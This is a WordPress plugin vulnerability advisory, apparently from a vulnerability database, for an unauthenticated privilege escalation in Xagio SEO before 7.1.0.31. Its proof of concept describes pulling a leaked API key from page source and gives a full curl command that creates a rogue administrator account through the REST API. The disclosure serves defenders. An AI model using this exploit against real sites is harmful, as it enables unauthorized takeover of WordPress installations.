Xagio SEO – AI Powered SEO < 7.1.0.31 – Unauthenticated Privilege Escalation | CVE 2026-24968 | Plugin Vulnerabilities

Description

The plugin is vulnerable to Privilege Escalation. This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.

Proof of Concept

Visit the home page, grab the api_key from the source code and base64 decode it (user:app-pass:hash)

Use the user and pass to create a malicious user like:

curl -X POST 'https://example.com/wp-json/wp/v2/users' \
    --user 'user:app-pass' \
    -H 'Content-Type: application/json' \
    -d '{"username":"hacker","password":"Password123!","email":"hacker@evil.com","roles":["administrator"]}'

Affects Plugins

Fixed in 7.1.0.31

References

CVE

URL

https://www.wordfence.com/threat-intel/vulnerabilities/id/2b409d63-a2e2-4304-90f2-dfa11db54be1

Classification

Type

PRIVESC

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

daroo

Verified

Yes

WPVDB ID

0cbcb12f-9b80-4233-863d-7262313e6c4a

Timeline

Publicly Published

2026-03-12 (about 2 months ago)

Added

2026-03-19 (about 2 months ago)

Last Updated

2026-05-29 (about 14 hours ago)

Other

Published

Title

Published

2020-04-13

Title

Responsive Poll < 1.3.4 - Broken Authentication and Missing Capability Checks on AJAX calls

Published

2024-07-10

Title

JSON API User < 3.9.4 - Unauthenticated Privilege Escalation

Published

2022-10-10

Title

Automatic User Roles Switcher < 1.1.2 - Subscriber+ Privilege Escalation

Published

2026-02-14

Title

Ecwid by Lightspeed Ecommerce Shopping Cart < 7.0.8 - Subscriber+ Privilege Escalation

Published

2025-05-30

Title

PSW Front-end Login & Registration <= 1.12 - Unauthenticated Account Takeover/Privilege Escalation